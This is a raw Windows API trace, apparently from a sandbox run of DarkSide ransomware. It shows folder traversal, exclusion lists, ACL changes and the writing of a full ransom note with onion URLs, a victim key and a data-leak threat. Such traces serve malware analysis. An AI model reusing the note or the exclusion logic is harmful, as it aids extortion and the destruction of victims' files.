lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.328] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0150.329] _wcsicmp (_Str1="backup", _Str2="Windows Live") returned -21 [0150.329] wcslen (_String="backup") returned 0x6 [0150.329] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0150.329] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0150.329] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.329] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0150.329] _wcsicmp (_Str1="backup", _Str2="Favorites") returned -4 [0150.329] wcslen (_String="backup") returned 0x6 [0150.329] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0150.330] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0150.330] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0150.330] _wcsicmp (_Str1="$recycle.bin", _Str2="Links") returned -72 [0150.330] wcslen (_String="$recycle.bin") returned 0xc [0150.330] _wcsicmp (_Str1="config.msi", _Str2="Links") returned -9 [0150.331] wcslen (_String="config.msi") returned 0xa [0150.331] _wcsicmp (_Str1="$windows.~bt", _Str2="Links") returned -72 [0150.331] wcslen (_String="$windows.~bt") returned 0xc [0150.331] _wcsicmp (_Str1="$windows.~ws", _Str2="Links") returned -72 [0150.331] wcslen (_String="$windows.~ws") returned 0xc [0150.331] _wcsicmp (_Str1="windows", _Str2="Links") returned 11 [0150.331] wcslen (_String="windows") returned 0x7 [0150.331] _wcsicmp (_Str1="appdata", _Str2="Links") returned -11 [0150.331] wcslen (_String="appdata") returned 0x7 [0150.331] _wcsicmp (_Str1="application data", _Str2="Links") returned -11 [0150.331] wcslen (_String="application data") returned 0x10 [0150.331] _wcsicmp (_Str1="boot", _Str2="Links") returned -10 [0150.331] wcslen (_String="boot") returned 0x4 [0150.331] _wcsicmp (_Str1="google", _Str2="Links") returned -5 [0150.331] wcslen (_String="google") returned 0x6 [0150.331] _wcsicmp (_Str1="mozilla", _Str2="Links") returned 1 [0150.331] wcslen (_String="mozilla") returned 0x7 [0150.331] _wcsicmp (_Str1="program files", _Str2="Links") returned 4 [0150.331] wcslen (_String="program files") returned 0xd [0150.331] _wcsicmp (_Str1="program files (x86)", _Str2="Links") returned 4 [0150.331] wcslen (_String="program files (x86)") returned 0x13 [0150.331] _wcsicmp (_Str1="programdata", _Str2="Links") returned 4 [0150.331] wcslen (_String="programdata") returned 0xb [0150.331] _wcsicmp (_Str1="system volume information", _Str2="Links") returned 7 [0150.331] wcslen (_String="system volume information") returned 0x19 [0150.331] _wcsicmp (_Str1="tor browser", _Str2="Links") returned 8 [0150.331] wcslen (_String="tor browser") returned 0xb [0150.331] _wcsicmp (_Str1="windows.old", _Str2="Links") returned 11 [0150.331] wcslen (_String="windows.old") returned 0xb [0150.331] _wcsicmp (_Str1="intel", _Str2="Links") returned -3 [0150.331] wcslen (_String="intel") returned 0x5 [0150.331] _wcsicmp (_Str1="msocache", _Str2="Links") returned 1 [0150.331] wcslen (_String="msocache") returned 0x8 [0150.331] _wcsicmp (_Str1="perflogs", _Str2="Links") returned 4 [0150.331] wcslen (_String="perflogs") returned 0x8 [0150.331] _wcsicmp (_Str1="x64dbg", _Str2="Links") returned 12 [0150.331] wcslen (_String="x64dbg") returned 0x6 [0150.331] _wcsicmp (_Str1="public", _Str2="Links") returned 4 [0150.332] wcslen (_String="public") returned 0x6 [0150.332] _wcsicmp (_Str1="all users", _Str2="Links") returned -11 [0150.332] wcslen (_String="all users") returned 0x9 [0150.332] _wcsicmp (_Str1="default", _Str2="Links") returned -8 [0150.332] wcslen (_String="default") returned 0x7 [0150.332] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0150.332] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0150.332] wcscpy (in: _Dest=0x4480094, _Source="Links" | out: _Dest="Links") returned="Links" [0150.332] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0150.332] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0150.333] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0150.333] GetNamedSecurityInfoW () returned 0x0 [0150.334] SetEntriesInAclW () returned 0x0 [0150.334] SetNamedSecurityInfoW () returned 0x0 [0150.338] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57d38) returned 1 [0150.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.338] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links")) returned 1 [0150.338] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.338] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.338] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.339] CloseHandle (hObject=0x678) returned 1 [0150.339] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links")) returned 0x11 [0150.340] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="" [0150.340] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 0x28 [0150.340] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0150.340] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd83a29c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd83a29c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.341] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0150.341] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0150.341] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0150.341] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0150.341] wcslen (_String="autorun.inf") returned 0xb [0150.341] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0150.341] wcslen (_String="boot.ini") returned 0x8 [0150.341] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0150.341] wcslen (_String="bootfont.bin") returned 0xc [0150.341] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0150.341] wcslen (_String="bootsect.bak") returned 0xc [0150.341] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0150.341] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0150.341] _wcsicmp (_Str1="Desktop.lnk", _Str2="README.c06622a1.TXT") returned -14 [0150.341] wcsstr (_Str="Desktop.lnk", _SubStr="README") returned 0x0 [0150.341] _wcsicmp (_Str1="autorun.inf", _Str2="Desktop.lnk") returned -3 [0150.341] wcslen (_String="autorun.inf") returned 0xb [0150.341] _wcsicmp (_Str1="boot.ini", _Str2="Desktop.lnk") returned -2 [0150.341] wcslen (_String="boot.ini") returned 0x8 [0150.341] _wcsicmp (_Str1="bootfont.bin", _Str2="Desktop.lnk") returned -2 [0150.341] wcslen (_String="bootfont.bin") returned 0xc [0150.341] _wcsicmp (_Str1="bootsect.bak", _Str2="Desktop.lnk") returned -2 [0150.341] wcslen (_String="bootsect.bak") returned 0xc [0150.341] _wcsicmp (_Str1="desktop.ini", _Str2="Desktop.lnk") returned -3 [0150.341] wcslen (_String="desktop.ini") returned 0xb [0150.341] _wcsicmp (_Str1="iconcache.db", _Str2="Desktop.lnk") returned 5 [0150.341] wcslen (_String="iconcache.db") returned 0xc [0150.341] _wcsicmp (_Str1="ntldr", _Str2="Desktop.lnk") returned 10 [0150.341] wcslen (_String="ntldr") returned 0x5 [0150.341] _wcsicmp (_Str1="ntuser.dat", _Str2="Desktop.lnk") returned 10 [0150.341] wcslen (_String="ntuser.dat") returned 0xa [0150.342] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Desktop.lnk") returned 10 [0150.342] wcslen (_String="ntuser.dat.log") returned 0xe [0150.342] _wcsicmp (_Str1="ntuser.ini", _Str2="Desktop.lnk") returned 10 [0150.342] wcslen (_String="ntuser.ini") returned 0xa [0150.342] _wcsicmp (_Str1="thumbs.db", _Str2="Desktop.lnk") returned 16 [0150.342] wcslen (_String="thumbs.db") returned 0x9 [0150.342] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0150.342] wcslen (_String="386") returned 0x3 [0150.342] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0150.342] wcslen (_String="adv") returned 0x3 [0150.342] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0150.342] wcslen (_String="ani") returned 0x3 [0150.342] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0150.342] wcslen (_String="bat") returned 0x3 [0150.342] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0150.342] wcslen (_String="bin") returned 0x3 [0150.342] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0150.342] wcslen (_String="cab") returned 0x3 [0150.342] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0150.342] wcslen (_String="cmd") returned 0x3 [0150.342] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0150.342] wcslen (_String="com") returned 0x3 [0150.342] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0150.342] wcslen (_String="cpl") returned 0x3 [0150.342] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0150.342] wcslen (_String="cur") returned 0x3 [0150.342] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0150.342] wcslen (_String="deskthemepack") returned 0xd [0150.342] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0150.342] wcslen (_String="diagcab") returned 0x7 [0150.342] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0150.342] wcslen (_String="diagcfg") returned 0x7 [0150.342] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0150.342] wcslen (_String="diagpkg") returned 0x7 [0150.342] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0150.342] wcslen (_String="dll") returned 0x3 [0150.343] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0150.343] wcslen (_String="drv") returned 0x3 [0150.343] _wcsicmp (_Str1="exe", _Str2="lnk") returned -7 [0150.343] wcslen (_String="exe") returned 0x3 [0150.343] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0150.343] wcslen (_String="hlp") returned 0x3 [0150.343] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0150.343] wcslen (_String="icl") returned 0x3 [0150.343] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0150.343] wcslen (_String="icns") returned 0x4 [0150.343] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0150.343] wcslen (_String="ico") returned 0x3 [0150.343] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0150.343] wcslen (_String="ics") returned 0x3 [0150.343] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0150.343] wcslen (_String="idx") returned 0x3 [0150.343] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0150.343] wcslen (_String="ldf") returned 0x3 [0150.343] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0150.343] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0150.343] _wcsicmp (_Str1="Downloads.lnk", _Str2="README.c06622a1.TXT") returned -14 [0150.343] wcsstr (_Str="Downloads.lnk", _SubStr="README") returned 0x0 [0150.343] _wcsicmp (_Str1="autorun.inf", _Str2="Downloads.lnk") returned -3 [0150.343] wcslen (_String="autorun.inf") returned 0xb [0150.343] _wcsicmp (_Str1="boot.ini", _Str2="Downloads.lnk") returned -2 [0150.343] wcslen (_String="boot.ini") returned 0x8 [0150.343] _wcsicmp (_Str1="bootfont.bin", _Str2="Downloads.lnk") returned -2 [0150.343] wcslen (_String="bootfont.bin") returned 0xc [0150.343] _wcsicmp (_Str1="bootsect.bak", _Str2="Downloads.lnk") returned -2 [0150.343] wcslen (_String="bootsect.bak") returned 0xc [0150.343] _wcsicmp (_Str1="desktop.ini", _Str2="Downloads.lnk") returned -10 [0150.343] wcslen (_String="desktop.ini") returned 0xb [0150.343] _wcsicmp (_Str1="iconcache.db", _Str2="Downloads.lnk") returned 5 [0150.343] wcslen (_String="iconcache.db") returned 0xc [0150.343] _wcsicmp (_Str1="ntldr", _Str2="Downloads.lnk") returned 10 [0150.343] wcslen (_String="ntldr") returned 0x5 [0150.343] _wcsicmp (_Str1="ntuser.dat", _Str2="Downloads.lnk") returned 10 [0150.344] wcslen (_String="ntuser.dat") returned 0xa [0150.344] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Downloads.lnk") returned 10 [0150.344] wcslen (_String="ntuser.dat.log") returned 0xe [0150.344] _wcsicmp (_Str1="ntuser.ini", _Str2="Downloads.lnk") returned 10 [0150.344] wcslen (_String="ntuser.ini") returned 0xa [0150.344] _wcsicmp (_Str1="thumbs.db", _Str2="Downloads.lnk") returned 16 [0150.344] wcslen (_String="thumbs.db") returned 0x9 [0150.344] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0150.344] wcslen (_String="386") returned 0x3 [0150.344] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0150.344] wcslen (_String="adv") returned 0x3 [0150.344] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0150.344] wcslen (_String="ani") returned 0x3 [0150.344] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0150.344] wcslen (_String="bat") returned 0x3 [0150.344] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0150.344] wcslen (_String="bin") returned 0x3 [0150.344] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0150.344] wcslen (_String="cab") returned 0x3 [0150.344] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0150.344] wcslen (_String="cmd") returned 0x3 [0150.344] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0150.344] wcslen (_String="com") returned 0x3 [0150.344] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0150.344] wcslen (_String="cpl") returned 0x3 [0150.344] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0150.344] wcslen (_String="cur") returned 0x3 [0150.344] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0150.344] wcslen (_String="deskthemepack") returned 0xd [0150.344] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0150.344] wcslen (_String="diagcab") returned 0x7 [0150.344] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0150.344] wcslen (_String="diagcfg") returned 0x7 [0150.344] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0150.344] wcslen (_String="diagpkg") returned 0x7 [0150.345] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0150.345] wcslen (_String="dll") returned 0x3 [0150.345] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0150.345] wcslen (_String="drv") returned 0x3 [0150.345] _wcsicmp (_Str1="exe", _Str2="lnk") returned -7 [0150.345] wcslen (_String="exe") returned 0x3 [0150.345] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0150.345] wcslen (_String="hlp") returned 0x3 [0150.345] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0150.345] wcslen (_String="icl") returned 0x3 [0150.345] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0150.345] wcslen (_String="icns") returned 0x4 [0150.345] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0150.345] wcslen (_String="ico") returned 0x3 [0150.345] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0150.345] wcslen (_String="ics") returned 0x3 [0150.345] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0150.345] wcslen (_String="idx") returned 0x3 [0150.345] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0150.345] wcslen (_String="ldf") returned 0x3 [0150.345] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0150.345] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd83a29c0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd83a29c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd83a29c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.345] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.345] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0150.345] _wcsicmp (_Str1="RecentPlaces.lnk", _Str2="README.c06622a1.TXT") returned 2 [0150.345] wcsstr (_Str="RecentPlaces.lnk", _SubStr="README") returned 0x0 [0150.345] _wcsicmp (_Str1="autorun.inf", _Str2="RecentPlaces.lnk") returned -17 [0150.345] wcslen (_String="autorun.inf") returned 0xb [0150.345] _wcsicmp (_Str1="boot.ini", _Str2="RecentPlaces.lnk") returned -16 [0150.345] wcslen (_String="boot.ini") returned 0x8 [0150.345] _wcsicmp (_Str1="bootfont.bin", _Str2="RecentPlaces.lnk") returned -16 [0150.345] wcslen (_String="bootfont.bin") returned 0xc [0150.345] _wcsicmp (_Str1="bootsect.bak", _Str2="RecentPlaces.lnk") returned -16 [0150.345] wcslen (_String="bootsect.bak") returned 0xc [0150.345] _wcsicmp (_Str1="desktop.ini", _Str2="RecentPlaces.lnk") returned -14 [0150.345] wcslen (_String="desktop.ini") returned 0xb [0150.345] _wcsicmp (_Str1="iconcache.db", _Str2="RecentPlaces.lnk") returned -9 [0150.346] wcslen (_String="iconcache.db") returned 0xc [0150.346] _wcsicmp (_Str1="ntldr", _Str2="RecentPlaces.lnk") returned -4 [0150.346] wcslen (_String="ntldr") returned 0x5 [0150.346] _wcsicmp (_Str1="ntuser.dat", _Str2="RecentPlaces.lnk") returned -4 [0150.346] wcslen (_String="ntuser.dat") returned 0xa [0150.346] _wcsicmp (_Str1="ntuser.dat.log", _Str2="RecentPlaces.lnk") returned -4 [0150.346] wcslen (_String="ntuser.dat.log") returned 0xe [0150.346] _wcsicmp (_Str1="ntuser.ini", _Str2="RecentPlaces.lnk") returned -4 [0150.346] wcslen (_String="ntuser.ini") returned 0xa [0150.346] _wcsicmp (_Str1="thumbs.db", _Str2="RecentPlaces.lnk") returned 2 [0150.346] wcslen (_String="thumbs.db") returned 0x9 [0150.346] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0150.346] wcslen (_String="386") returned 0x3 [0150.346] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0150.346] wcslen (_String="adv") returned 0x3 [0150.346] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0150.346] wcslen (_String="ani") returned 0x3 [0150.346] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0150.346] wcslen (_String="bat") returned 0x3 [0150.346] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0150.346] wcslen (_String="bin") returned 0x3 [0150.346] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0150.346] wcslen (_String="cab") returned 0x3 [0150.346] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0150.346] wcslen (_String="cmd") returned 0x3 [0150.346] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0150.346] wcslen (_String="com") returned 0x3 [0150.346] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0150.346] wcslen (_String="cpl") returned 0x3 [0150.346] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0150.346] wcslen (_String="cur") returned 0x3 [0150.346] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0150.346] wcslen (_String="deskthemepack") returned 0xd [0150.346] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0150.346] wcslen (_String="diagcab") returned 0x7 [0150.346] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0150.346] wcslen (_String="diagcfg") returned 0x7 [0150.346] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0150.347] wcslen (_String="diagpkg") returned 0x7 [0150.347] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0150.347] wcslen (_String="dll") returned 0x3 [0150.347] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0150.347] wcslen (_String="drv") returned 0x3 [0150.347] _wcsicmp (_Str1="exe", _Str2="lnk") 